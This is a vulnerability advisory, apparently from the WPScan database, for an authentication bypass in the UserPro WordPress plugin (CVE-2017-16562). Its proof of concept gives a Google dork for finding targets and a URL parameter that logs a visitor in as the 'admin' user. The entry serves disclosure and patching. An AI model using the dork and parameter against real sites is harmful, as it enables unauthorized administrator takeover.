UserPro <= 4.9.17 - Authentication Bypass



Description
The userpro plugin has the ability to bypass login authentication for the user
 'admin'. If the site does not use the standard username 'admin' it is not affected.
Proof of Concept
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in will full administrator access.

Affects Plugin

fixed in version 4.9.17.1

References

CVE 2017-16562
EXPLOITDB 43117
URL https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Submitter Colette Chamberland, Iain Hadgraft
Submitter Twitter cjchamberland
Views 5194
Verified No
WPVDB ID 8950

Timeline

Publicly Published 2017-11-10 (about 2 years ago)
Added 2017-11-12 (about 2 years ago)
Last Updated 2019-11-01 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin